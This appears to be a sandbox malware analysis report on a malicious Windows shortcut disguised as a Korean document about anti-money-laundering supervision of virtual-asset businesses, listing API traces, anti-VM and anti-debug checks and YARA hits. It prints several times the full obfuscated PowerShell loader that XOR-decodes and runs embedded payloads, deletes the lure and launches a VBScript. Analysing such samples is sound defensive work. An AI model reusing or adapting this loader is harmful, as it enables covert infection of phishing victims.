CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 3, 2025, 10:19 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 164 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:19 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\가상자산 사업자 자금세탁방지 감독 방향.hwp.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${````[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${````[~},0,<#salt conviction#>${~[)==}); ${~``=.-}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${````[~}[${ #}0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;} = lovely -conclusion ${==@}; <#everybody only#>if(${][;}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;} = lovely -conclusion ${==@};} return ${][;};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '.','lnk'), [System.IO.SearchOption]::AllDirectories) \| <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${ } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${````[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${````[~},0,<#salt conviction#>${~[)==}); ${~``=.-}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${````[~}[${ #}0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;} = lovely -conclusion ${==@}; <#everybody only#>if(${][;}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;} = lovely -conclusion ${==@};} return ${][;};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '.','lnk'), [System.IO.SearchOption]::AllDirectories) \| <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${ } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) )

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 3, 2025, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${````[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${````[~},0,<#salt conviction#>${~[)==}); ${~``=.-}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${````[~}[${ #}0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;} = lovely -conclusion ${==@}; <#everybody only#>if(${][;}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;} = lovely -conclusion ${==@};} return ${][;};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '.','lnk'), [System.IO.SearchOption]::AllDirectories) \| <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${ } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
